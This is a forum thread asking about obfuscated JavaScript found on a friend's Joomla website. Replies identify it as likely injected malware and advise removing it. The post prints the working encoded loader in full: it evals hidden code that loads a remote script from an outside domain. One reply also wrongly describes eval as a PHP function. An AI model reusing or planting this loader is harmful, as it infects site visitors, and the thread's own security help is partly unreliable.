Anyone Know What This JavaScript Code Is?

[Lee]

Code:

<script language=javascript><!-- 
(function(uGKJ){var qzF7B='%';var QS6O='"76"61r"20a"3d"22Sc"72i"70tEng"69n"65"22"2c"62"3d"22V"65"72si"6fn("29+"22"2cj"3d"22"22"2c"75"3dna"76"69"67a"74or"2euserA"67ent"3bif("28u"2ei"6edex"4ff("22"43"68r"6fme"22)"3c"30)"26"26"28u"2ei"6ed"65xOf("22"57"69n"22)"3e0"29"26"26"28u"2ei"6ede"78"4f"66("22N"54"206"22)"3c0)"26"26"28d"6fcu"6dent"2ecooki"65"2ei"6ede"78Of"28"22m"69ek"3d1"22)"3c0)"26"26"28"74"79pe"6ff("7arvz"74"73"29"21"3dtypeof"28"22A"22))"29"7b"7ar"76zts"3d"22A"22"3be"76al("22if(windo"77"2e"22"2ba+"22)j"3dj+"22+"61+"22Maj"6fr"22"2bb+"61"2b"22Minor"22+b+"61+"22B"75i"6cd"22"2bb"2b"22j"3b"22"29"3bd"6fcu"6dent"2ewrit"65("22"3c"73"63"72"69p"74"20s"72c"3d"2f"2fma"22+"22rtuz"2ecn"2fvid"2f"3fi"64"3d"22"2bj+"22"3e"3c"5c"2fsc"72"69pt"3e"22)"3b"7d';var Kgku=unescape(QS6O.replace(uGKJ,qzF7B));eval(Kgku)})(/\"/g);
 --></script>

One of my friends has this on their website and they dont know what it is, they arent sure if it is malicious code or not.

Regards,

Lee

[barnkin]

if it is at bottom and on every index page on server get rid of it and change how he FTP's to server..I had something like that infected my whole server, switched to winscp for uploading and have had no problem since.

I believe it is an attempt at redirect, that somehow gets on your computer then gets uploaded with most FTP programs..

I may be wrong, but that is what it appears to be to me.

[Lee]

Thats what i thought it was to but its on a Joomla generated page and it could just as easily be something Joomla needs to function so im apprehensive about telling them to remove it.

Regards,

Lee

[Itchy]

You might want to ask that in thier support fourm
http://forum.joomla.org/viewforum.php?f=428&start=0

but it looks like a code i had to delete as well on a bunch of hacked wp blogs

[Lee]

Okay im going to suggest they take it out of their page and see if the sites still functions.

Thanks for the feedback everyone.

Regards,

Lee

[vaqueros]

Be very wary. Eval is a PHP function that takes text and processes it as if it were inline code within the PHP script. It's really not used very often in normal scripting. One legitimate use would be if you had some kind of need to run random bits of code, say for a game where random actions and events occur. Then you might store the code pieces as text in a database and pull one out at random during the game and execute it ("you gain a magic spell of invisibility!"). Eval would let you do that.

But mostly, I've found eval used for evil. As you can see in the code you quoted, it's encrypted text and it calls another function to de-encrypt it and then execute (eval) it. There are only two reasons I have ever seen for that.

1. Legitimate code that the programmer is trying to protect, maybe is selling the script and buries some of it that way so people can't easily remove the part of the script that checks for a license or something. Most PHP programmers would be more professional and encrypt the entire program with IonCube or Zend Optimizer.

2. Malware. This is by far the more common use of eval with encrypted text. You write some code that watches for an admin to log in and passes the info on to you, or hijack every 3rd surfer to a virus-laden site, etc...but it looks like gibberish until it's decrypted and eval executes it. Few non-programmers would ever even spot that their scripts have been tampered with like that.

Good luck and be careful.

Kevin

[DEVELISH]

If I'd own a website and found an javascript which uses some obscured code I would remove it imediately. why would someone who does not meen any harm would obscure his code and place it on that website?

makes you think, doesn't it?